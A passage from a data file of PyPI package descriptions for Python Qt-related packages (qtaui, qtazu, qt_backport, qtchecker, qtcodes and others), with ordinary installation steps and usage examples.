yourmainentry point to also beasync, which might be hard to accommodate in an existing application.qt-async-threads, on the other hand, focuses only on one feature: allow the user to leverageasync/awaitsyntax tohandle threads more naturally, without the need for major refactorings in existing applications.LicenseDistributed under the terms of theMITlicense."} +{"package": "qtaui", "pacakge-description": "qtaui - (c) J\u00e9r\u00f4me Laheurte 2015Table of contentsWhat is qtaui ?Supported platformsInstallationAPI documentationChangelogWhat is qtaui ?qtaui is a minimalist clone of wxPython\u2019swxaui. It allows a PySide-based program to arrange \u201cframes\u201d, i.e. child widgets, in an arbitrary tree of splitters and tabs. The user can \u201cundock\u201d a frame and let it float as a top-level window, or drop it back onto the UI in a position that will create a new splitter or tabbed interface, or add it to an existing one.This code is licensed under theGNU LGPL version 3 or, at your\noption, any later version.Supported platformsPython 2.7 with PySide 1.2.InstallationUsing pip:$ pip install -U qtauiFrom source:$ wget https://pypi.python.org/packages/source/q/qtaui/qtaui-1.0.3.tar.gz\n$ tar xjf qtaui-1.0.3.tar.bz2; cd qtaui-1.0.3\n$ sudo python ./setup.py installAPI documentationThe full documentation is hostedhere.ChangelogVersion 1.0.3:Fix addChild() signaturesVersion 1.0.2:Another Pypi-related fix\u2026Version 1.0.1:Pypi-related fixes.Version 1.0.0:First release."} +{"package": "qtawk", "pacakge-description": "DescriptionQtawk is a graphical tool to generate bash scripts very quickly and without pain.official websitehttps://qtawk.ntik.org/documentationhttps://qtawk.ntik.org/docs/index.htmlcontactmail :qtawk-dev@ntik.orgIRC : ntick.org #qtawk (port 6667 SSL)"} +{"package": "qtazu", "pacakge-description": "Python Qt widgets forCG-Wireusing`gazu`__.DependenciesThis requiresGazuandQt.py.What is Qtazu?Qtazuimplements Qt widgets to connect and work with a CG-Wire\ninstance through an interface running in Python.Reusable components to develop your own interfaces to interact with\nCG-Wire.Embeddable in DCCs supporting Python and QtOruse them in your own standalone Python application, like a\nstudio pipeline.Agnostic widgets so you can easily instantiate them as you needSupport PyQt5, PySide2, PyQt4 and PySide through`Qt.py`__WIP:This is a WIP repositoryExamplesThe Widgets initialize in such a way you can easily embed them for your\nneeds.The examples assume a running Qt application instance exists.Logging inqtazu_loginfromqtazu.widgets.loginimportLoginwidget=Login()widget.show()If you want to set your CG-Wire instance URL so the User doesn\u2019t have to\nyou can set it through environment variable:CGWIRE_HOSTfromqtazu.widgets.loginimportLoginimportosos.environ[\"CGWIRE_HOST\"]=\"https://zou-server-url/api\"widget=Login()widget.show()Directly trigger a callback once someone has logged in using Qt signals:fromqtazu.widgets.loginimportLogindefcallback(success):print(\"Did login succeed? Answer:%s\"%success)widget=Login()widget.logged_in.connect(callback)widget.show()You can also automate alogin through\n``gazu``__ andqtazuwill use it.Or if you have logged in through another Python process you can pass on\nthe tokens:importosimportjson# Store CGWIRE_TOKENS for application (simplified for example)os.environ[\"CGWIRE_TOKENS\"]=json.dumps(gazu.client.tokens)os.environ[\"CGWIRE_HOST\"]=host# In application \"log-in\" using the tokenshost=os.environ[\"CGWIRE_HOST\"]tokens=json.loads(os.environ[\"CGWIRE_TOKENS\"])gazu.client.set_host(host)gazu.client.set_tokens(tokens)Submitting CommentsYou can easily submit comments for a specific Task, this includes drag\n\u2018n\u2019 dropping your own images of videos as attachment or using a Screen\nMarguee tool to attach a screenshot to your comment.Make sure you are logged in prior to this.fromqtazu.widgets.commentimportCommentWidgettask_id=\"xyz\"# Make sure to set a valid Task Idwidget=CommentWidget(task_id=task_id)widget.show()qtazu_comment_screenshotDisplay all Persons with ThumbnailsIt\u2019s easy and quick to embed the available Persons into your own list\nview.qtazu_persons_modelfromqtazu.models.personsimportPersonModelfromQtimportQtWidgets,QtCoremodel=PersonModel()view=QtWidgets.QListView()view.setIconSize(QtCore.QSize(30,30))view.setStyleSheet(\"QListView::item { margin: 3px; padding: 3px;}\")view.setModel(model)view.setMinimumHeight(60)view.setWindowTitle(\"CG-Wire Persons\")view.show()Here\u2019s an example prototype of listing Persons as you tag them:qtazu_tag_prototype_02Define your own Qt widget that loads Thumbnails in the backgroundThis will show all CG-Wire projects as thumbnails.qtazu_projectsimportgazufromQtimportQtWidgetsfromqtazu.widgets.thumbnailimportThumbnailBasemain=QtWidgets.QWidget()main.setWindowTitle(\"CG-Wire Projects\")layout=QtWidgets.QHBoxLayout(main)forprojectingazu.project.all_open_projects():thumbnail=ThumbnailBase()thumbnail.setFixedWidth(75)thumbnail.setFixedHeight(75)thumbnail.setToolTip(project[\"name\"])project_id=project[\"id\"]thumbnail.load(\"pictures/thumbnails/projects/{0}.png\".format(project_id))layout.addWidget(thumbnail)main.show()Welcome a User with a messageShow a Welcome popup to the user with his or her thumbnail.qtazu_welcome_popupfromQtimportQtWidgets,QtGui,QtCorefromqtazu.widgets.thumbnailimportThumbnailBaseimportgazuclassUserPopup(QtWidgets.QWidget):\"\"\"Pop-up showing 'welcome user' and user thumbnail\"\"\"def__init__(self,parent=None,user=None):super(UserPopup,self).__init__(parent=parent)layout=QtWidgets.QHBoxLayout(self)thumbnail=ThumbnailBase()thumbnail.setFixedWidth(75)thumbnail.setFixedHeight(75)thumbnail.setToolTip(user[\"first_name\"])welcome=QtWidgets.QLabel(\"Welcome!\")layout.addWidget(thumbnail)layout.addWidget(welcome)self.thumbnail=thumbnailself.welcome=welcomeself._user=Noneifuser:self.set_user(user)defset_user(self,user):self._user=user# Load user thumbnailself.thumbnail.load(\"pictures/thumbnails/persons/{0}.png\".format(user[\"id\"]))# Set welcome messageself.welcome.setText(\"Welcome{first_name}{last_name}!\".format(**user))# Show pop-up about current useruser=gazu.client.get_current_user()popup=UserPopup(user=user)popup.show()"} +{"package": "qt_backport", "pacakge-description": "qt_backportqt_backportmakes unmodified python code based on Qt4 work with Qt5.More specifically (and currently), if you have PyQt5 installed and\nfunctional, but want to work with older PyQt4 or PySide code without having\nto do any conversion work, this package is for you!InstallationUninstall any existing Qt4 wrapper (PyQt4 or PySide) if you have one.Install PyQt5pip install qt_backportUsageqt_backportautomatically makes both \u2018PyQt4\u2019 and \u2018PySide\u2019 packages\navailable that will function like the old Qt4 versions, but will actually be\nbacked by PyQt5.ie: your old code like this will just work as-is:import PyQt4\nfrom PyQt4 import QtCore\nfrom PyQt4.QtGui import * #<-- this is supported, but yuckorimport PySide\nfrom PySide import QtCore\nfrom PySide.QtGui import * #<-- this is supported, but yuckWhen to useqt_backport?This package is particularly useful when you have installed a modern Qt5\nwrapper (currently only PyQt5) and are trying to learn Qt using legacy code\nexamples you find on the web.qt_backportis not primarily intended as a method for porting your\napplications from Qt4 to Qt5 (you are better off converting if you can), but\nit does do a good job of this and can definitely help get you started.Why isqt_backportneeded at all?When Qt4 was updated to Qt5 there was amajorreorganization done to the\nclass organization. In addition, there have been many other API changes.One of the most significant changes was that a huge number of classes that\nused to be contained within \u2018QtGui\u2019 were dispersed out to various other\nlocations instead. eg:Allof the widgets were moved out of QtGui and into\na new module called QtWidgets. Although the new locations make much more\nsense, it broke a lot of old code.qt_backportis a hack to make old\ncode work as-is.There have been many more API changes in the Qt 4.x to Qt 5.2 transition (Qt\n5.2 is current the time of writing this).qt_backportdeals with many of\nthese changes, but all of them may not be captured (yet). A simple example of\nsuch a change (thatqt_backporthandles) is that QColor.dark() was\nremoved and replaced with QColor.darker() in Qt 4.3.Note that, although the backport generally works quite well, there may be\nadditional changes you need to make to to your old code for it to work. These\nchanges depend on the vintage of your old code. For example, old style\nsignal/slot connections are not currently supported.NOTE: At the current time, the only Qt wrapper for python that works with Qt5\nis PyQt5. In future this may change (eg: when PySide upgrades to use Qt5).How does it work?qt_backportwraps Qt using PyQt5 (currently the only python wrapper for\nQt5), but provides an emulation layer that emulates both the PySide and the\nPyQt4 APIs. Installingqt_backportautomatically makes the PySide and\nPyQt4 emulators available for import.This is easier to see visually:+-----------------------------------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009Existing\u2009Python\u2009code\u2009that\u2009expects\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009the\u2009PyQt4\u2009or\u2009PySide\u2009API\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+-------+------------------+--------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009OLD\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009WAY\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\nqt_backport\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009PySide\u2009or\u2009\u2009|\nEmulation\u2009layer:\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009PyQt4\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+--------+--------+\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\nWrapper\u2009layer:\u2009\u2009\u2009\u2009|\u2009PySide\u2009or\u2009PyQt4\u2009|\u2009\u2009\u2009|\u2009\u2009\u2009PyQt5\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+--------+--------+\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+----+-----+\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+---+-----+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\nQt\u2009library\u2009layer:\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009Qt4\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009Qt5\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+----------+\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+---------+To do:support old-style connections (ie:connect(app,SIGNAL(),app, SLOT())support more known api changesAPI change coverage is currently not 100%, being mostly driven by demand for certain classes/methods. Coverage is currently quite good, though.other potential changes are covered here:http://qt-project.org/doc/qt-5/portingguide.htmlunit tests for the zillion api patchesLicenseMIT. See LICENSE file."} +{"package": "qt-binder", "pacakge-description": "QtBinder provides a way to bind Qt widgets to Traits models."} +{"package": "qtbot", "pacakge-description": "UNKNOWN"} +{"package": "qtbox", "pacakge-description": "Qt Box (\u4e2d\u6587)Qt Box contains many common and useful PyQt & PySide widget demos, which may save your time during development.Installationpip install qtboxHow to useOpen a command window and use commandqtboxto show Qt Box GUI.Right-click on a widget shown in the Style tab or Function tab, then you can view or download the code.When viewing the code, you can click on the switch button to show PyQt, PySide or C++/Qt code.On the main window, click on the switch button to change the window theme.Click on the edit button or typeqtbox-qssin the command window to open QSS Editor.For C++ Qt usersIf you don't have a Python environment, downloadQtBox.zipwhich includesqtbox.exeexecutable file.Support authorSupport author to make this project better. Thanks a lot. :)PayPalWeChat or AliPayOther linksGithubCSDNBilibili\u77e5\u4e4ePyPi"} +{"package": "qtb-plot", "pacakge-description": "QTB PlotThis package is basically just a convenience matplotlib option setter.\nYou have two ways of using it.\nWithset_styleyou set the style for the entire notebook or whatever session\nyou are working in and withplotting_contextyou create a context manager\nthat will only set the style locally for the current plot.Take a look at the supplied tutorial notebok to see how this is done.The easiest way of installing the package is to cd into the package folder and to install it locally withpip install -e ."} +{"package": "qtbricks", "pacakge-description": "qtbricksPython Qt components: widgets and utils, focussing on scientific GUIs.Welcome! This is qtbricks, a Python package collecting a growing series of \u201creal-world\u201dGUI widgetsand related tools written with and forPySide6, the official Python bindings for Qt6.Do you want or need to create complex GUIs with Python and Qt but don\u2019t want to spend too much time reimplementing seemingly basic widgets and functionality? Are you overwhelmed by the complexity of GUI programming and just want to focus on the actual tasks that need to get done? So do we, and that\u2019s how qtbricks was born.Separate the GUI from the business logicin your code, provide a series of high-level GUI widgets for (admittedly complex) standard tasks,focus on as readable and as Pythonic code as possible. And yes, it has a clear focus onGUIs for scientific data analysistasks.FeaturesA list of features:Highly modular code: each widget is as self-contained as possibleUser-friendly: obvious behaviour, no surprises, hints (via tooltips) includedSeparation of concerns: widgets handle the GUI stuff and expose a programmatic APIDesigned with code readability in mindAnd to make it even more convenient for users and future-proof:Open source project written in Python (>= 3.7)Developed fully test-driven (well, not yet\u2026)Extensive user and API documentationInstallationTo install the qtbricks package on your computer (sensibly within a Python virtual environment), open a terminal (activate your virtual environment), and type in the following:pip install qtbricksLicenseThis program is free software: you can redistribute it and/or modify it under the terms of theBSD License.A note on the nameWhy \u201cqtbricks\u201d? What is in a name? A name should answer the important questions (What is it? What does it?), should be easy to remember and reasonably unique to be searchable (findable!) on the web. Bricks are basic building blocks, more generic than the term \u201cwidget\u201d in a GUI context, and after all, bricks seem to have a natural connection to windows, haven\u2019t they?"} +{"package": "qt-brohub", "pacakge-description": "qt-brohubPython Broker API client, not your typical bro, but definitely the one you need for trading.Installation$python-mpipinstallqt-brohub"} +{"package": "qtc", "pacakge-description": "No description available on PyPI."} +{"package": "qtcd", "pacakge-description": "An ECDSA and XMSS interchangeable, decentralized P2P, mining-resistant, fully anonymized, self-regulating and backward stochastic python implementation of the bitcoin protocol"} +{"package": "qtchecker", "pacakge-description": "Authors: Jan Kota\u0144ski IntroductionThis is a simple helper module to perform PyQt GUI tests.Source code:https://github.com/jkotan/qtcheckerProject Web page:https://jkotan.github.io/qtcheckerWith theqtcheckermodule its usercreatesQtCheckerobject with the global QApplication object and a given tested QWidget dialog parametersdefines a sequence of checks withsetChecks()method and the following helper classes:AttrCheck- read a tested dialog attribute valueCmdCheck- execute a tested dialog command and read its result valueWrapAttrCheck- execute a wrapper command on a tested dialog attributeWrapCmdCheck- execute a wrapper command on a result value of a tested dialog commandExtAttrCheck- read an external attribute value defined outside the dialogExtCmdCheck- execute an external command defined outside the dialog and read its result valuestarts event loop and performs checkes withexecuteChecks()orexecuteChecksAndClose()methodcompare results by readingresultsattribute of executingfor exampleimportunittestfromPyQt5importQtGuifromPyQt5importQtCorefromPyQt5importQtTestfromqtchecker.qtCheckerimportQtChecker,CmdCheck,WrapAttrCheck,ExtCmdCheck# import my dialog modulefromlavuelibimportliveViewer# QApplication object should be one for all tessapp=QtGui.QApplication([])classGuiTest(unittest.TestCase):def__init__(self,methodName):unittest.TestCase.__init__(self,methodName)deftest_run(self):# my tested MainWindow dialogdialog=liveViewer.MainWindow()dialog.show()# create QtChecker objectqtck=QtChecker(app,dialog)# define a sequence of action of the dialogqtck.setChecks([# read return value of execute isConnected commandCmdCheck(# a python path to a method executed in the first action\"_MainWindow__lavue._LiveViewer__sourcewg.isConnected\"),# click pushButton with the left-mouse-clickWrapAttrCheck(# a python path to an pushButton object\"_MainWindow__lavue._LiveViewer__sourcewg._SourceTabWidget__sourcetabs[],0._ui.pushButton\",# Wrapper command to be executed on the action objectQtTest.QTest.mouseClick,# additional parameters of the wrapper command[QtCore.Qt.LeftButton]),# read a result of external \"getLAvueState\" commandExtCmdCheck(# parent object of the external commandself,# external command name\"getLavueState\"),])# execute the check actions and close the dialogstatus=qtck.executeChecksAndClose()self.assertEqual(status,0)# compare results returned by each actionqtck.compareResults(self,[# a result of isConnected() commandTrue,# a result of the mouseClick on the pushButtonNone,# a result of getLavueState() command'{\"connected\": false}'])defgetLavueState(self):\"\"\" an external command \"\"\"importtangoreturntango.DeviceProxy(\"po/lavuecontroller/1\").LavueStateMore examples can be found at likeLavueTestsorLavueStateTests.InstallationQtChecker requires the following python packages:qt4orqt5orpyqtgraph.From sourcesDownload the latest QtChecker version fromhttps://github.com/jkotan/qtcheckerExtract sources and run$pythonsetup.pyinstallThesetup.pyscript may need:setuptools sphinxpython packages as well asqtbase5-dev-toolsorlibqt4-dev-bin.Debian packagesDebianbusterandstretchor Ubuntufocal,eoan,bionicpackages can be found in the HDRI repository.To install the debian packages, add the PGP repository key$sudosu$wget-q-O-http://repos.pni-hdri.de/debian_repo.pub.gpg|apt-keyadd-and then download the corresponding source list, e.g.$cd/etc/apt/sources.list.dand$wgethttp://repos.pni-hdri.de/buster-pni-hdri.listor$wgethttp://repos.pni-hdri.de/stretch-pni-hdri.listor$wgethttp://repos.pni-hdri.de/focal-pni-hdri.listrespectively.Finally,$apt-getupdate$apt-getinstallpython-qtchecker$apt-getupdate$apt-getinstallpython3-qtcheckerfor python 3 version.From pipTo install it from pip you need to install pyqt5 in advance, e.g.$python3-mvenvmyvenv$.myvenv/bin/activate$pipinstallpyqt5$pipinstallqtchecker"} +{"package": "qtciutil", "pacakge-description": "qt-ci-utilSome basic python methods for building CI for qt projects.Usagepip install qtciutilScript example:importqtciutil# Get Qt Versionqt_version_str=qtciutil.qt_version()# Build Qt Projectqtciutil.build('/home/l2m2/workspace/xxx/src/xxx.pro','/home/l2m2/workspace/xxx/build','debug')# Unit Testqtciutil.unit_test('/home/l2m2/workspace/xxx/test/test.pro','/home/l2m2/workspace/xxx/build','/home/l2m2/workspace/xxx/dist')LicenseMITPublish to PyPIpip install --user --upgrade setuptools wheel twine\npython setup.py sdist bdist_wheel\npython -m twine upload dist/*Referencehttps://juejin.im/post/5d8814adf265da03be491737"} +{"package": "qtcodes", "pacakge-description": "qtcodesQiskit Topological CodesInstallationConda users, please make sure toconda install pipbefore running any pip installation if you want to installqtcodesinto your conda environment.qtcodesis published on PyPI. So, to install, simply run:pipinstallqtcodesIf you also want to download the dependencies needed to run optional tutorials, please usepip install qtcodes[dev]orpip install 'qtcodes[dev]'(forzshusers).To check if the installation was successful, run:>>>importqtcodesasqtcBuilding from sourceTo buildqtcodesfrom source, pip install using:gitclonehttps://github.com/yaleqc/qtcodes.gitcdqtcodes\npipinstall--upgrade.If you also want to download the dependencies needed to run optional tutorials, please usepip install --upgrade .[dev]orpip install --upgrade '.[dev]'(forzshusers).Installation for DevsIf you intend to contribute to this project, please installqtcodesin editable mode as follows:gitclonehttps://github.com/yaleqc/qtcodes.gitcdqtcodes\npipinstall-e.[dev]Please usepip install -e '.[dev]'if you are azshuser.Building documentation locallySet yourself up to use the[dev]dependencies. Then, from the command line run:mkdocsbuildMotivationQuantum computation is an inherently noisy process. Scalable quantum computers will require fault-tolerance to implement useful computation. There are many proposed approaches to this, but one promising candidate is the family oftopological quantum error correcting codes.Currently, theqiskit.ignis.verification.topological_codesmodule provides a general framework for QEC and implements one specific example, therepetition code. Qiskit Topological Codes builds out theqtcodesmodule into a diverse family of QEC encoders and decoders, supporting the repetition code, XXXX/ZZZZ (XXZZ) rotated surface code, and the XZZX rotated surface code.Inspired by theQiskit Textbook, we've written a full set ofjupyter notebook tutorialsto demonstrate thecircuit encoders,graph decoders, andbenchmarking toolsthat compose Qiskit Topological Codes. These tutorials both demonstrate the elegance of QEC codes as well as the utility of this package -- please check them out!CodebaseFig 1.Rotated XXXX/ZZZZ (XXZZ) Surface Code. ZZZZ/ZZ syndromes in red, XXXX/XX syndromes in purple, physical errors in green, and syndrome hits in yellow.Topological QEC codes disperse, and thus protect, one quantum bit of logical information across many physical qubits. The classical repetition code distributes 1 bit of logical information across multiple imperfect physical bits (e.g. logical 0 is 000...0 and logical 1 is 111...1). In the classical repetition logical 0 bit, for example, a few physical bits may flip to 1, but the majority will very likely stay in 0, thus preserving the logical 0 bit. Similarly, the surface code protects one logical qubit in a grid of imperfect physical qubits against Pauli errors.Theqtcodesmodule can be broken down intocircuits(encoders) andfitters(decoders). Additionally, unittests can be found intestsand benchmarking tools inqtcodes/tools.The rotated surface code is based on the earlier theoretical idea of atoric code, with periodic boundary conditions instead of open boundary conditions. This has been shown to be largely identical, but embedding a surface code on an actual device is much easier.CircuitsTheqtcodes.circuitssub-module contains classes such asXXZZQubit,XZZXQubit, andRepetitionQubit, which each allow users to construct and manipulate circuits encoding one logical qubit using a particular QEC code.For example, we can create and apply a logical X onto aRepetitionQubitas followsfromqtcodesimportRepetitionQubitqubit=RepetitionQubit({\"d\":3},\"t\")qubit.reset_z()qubit.stabilize()qubit.x()qubit.stabilize()qubit.readout_z()qubit.draw(output='mpl',fold=150)qtcodes.circuits.circalso allows users to createTopologicalRegisters (treg: a collection of topological qubits) andTopologicalCircuits (tcirc: a circuit built using a treg), the analog ofQuantumRegisterandQuantumCircuit.We can, for example, create a tcirc and treg out of twoRepetitionQubits.fromqtcodesimportTopologicalRegister,TopologicalCircuittreg=TopologicalRegister(ctypes=[REPETITION,REPETITION],params=[{\"d\":3},{\"d\":3}])circ=TopologicalCircuit(treg)circ.x(treg[0])circ.stabilize(treg[1])circ.x(1)circ.draw(output='mpl',fold=500)Learn more about circuits through encoder tutorials such as thisonefor the XXXX/ZZZZ rotated surface code.FittersTopological codes aim to build better (read: less noisy) logical qubits out of many imperfect physical qubits. This improvement is enabled by decoding schemes that can detect and thus correct for errors on a code's constituent physical qubits.The Qiskit Topological Codes package leverages Minimum-Weight Perfect Matching Graph Decoding to efficiently correct logical qubit readout.For example, we can decode the syndrome hits in Fig 1 and fine the most probable error chains (data qubit flips) corresponding to these syndrome hits.#d: surface code side length, T: number of roundsdecoder=RotatedDecoder({\"d\":5,\"T\":1})all_syndromes={\"X\":[(0,1.5,.5),(0,.5,1.5)],\"Z\":[(0,0.5,0.5),(0,1.5,1.5),(0,1.5,3.5),(0,3.5,3.5)]}matches={}forsyndrome_key,syndromesinall_syndromes.items():print(f\"{syndrome_key}Syndrome Graph\")error_graph=decoder._make_error_graph(syndromes,syndrome_key)print(\"Error Graph\")decoder.draw(error_graph)matches[syndrome_key]=decoder._run_mwpm(error_graph)matched_graph=decoder._run_mwpm_graph(error_graph)print(\"Matched Graph\")decoder.draw(matched_graph)print(f\"Matches:{matches[syndrome_key]}\")print(\"\\n===\\n\")In this way, Qiskit Topological Codes uses graph decoding to find and correct for the most probable set of errors (error chains).The careful reader will notice that connecting syndrome hits in the most probable set of \"error chains\" does not uniquely specify the underlying physical qubits that underwent physical errors (i.e. there are multiple shortest paths between two syndrome hits). It turns out, by the nuances of how topological codes store logical information (i.e. codespace), in most cases the exact path across physical qubits doesn't matter when correcting for an error chain. Read more about this in thistutorialon Decoding for XXZZ Qubits!BenchmarkingFinally, the efficiency and efficacy of the Qiskit Topological Codes package is demonstrated through benchmark simulations achieving threshold for the Repetition, XXZZ, and XZZX topological codes. Here, threshold is defined as the maximum physical error rate (i.e. imperfection level of physical qubits) below which larger surface codes perform better than smaller surface codes.Fig. 2By simulating circuits with errors inserted between two rounds of stabilizing measurements, we are able to extract a logical error rate for each code for a given physical error rate (quality of physical qubit) and surface code size. In particular, threshold is shown for the repetition code (left), XXZZ code (center), and XZZX code (right).Explore the benchmarkingtoolsandsimulationsto see how the graphs in Fig. 2 were created.Future DirectionsCheckoutissuesto see what we are working on these days!AcknowledgementsCore Devs:Shantanu Jha,Amir Ebrahimi,Jeffrey GongThanks to our mentorJames Wootton(IBM) for invaluable feedback and support since the inception of this project at the IBM Qiskit - Summer Jam Hackathon 2020.Thanks also toMatthew Treinishfrom theretworkxteam for helping onboard and support this project.Alums:Henry Liu,Shraddha Singh,Will Sun,Andy Ding,Jessie Chen,Aaron Householder,Allen MiReferencesHere's some reading material that we found particularly useful:Presentationslidesandvideoabout this package to the Qiskit Advocate community at the November 2020 Qiskit Advocate Demo Session.Surface Codes: Towards Practical Large-Scale Quantum ComputationStabilizer Codes and Quantum Error CorrectionMulti-path Summation for Decoding 2D Topological CodesQiskit Textbook - Introduction to Quantum Error Correction using Repetition 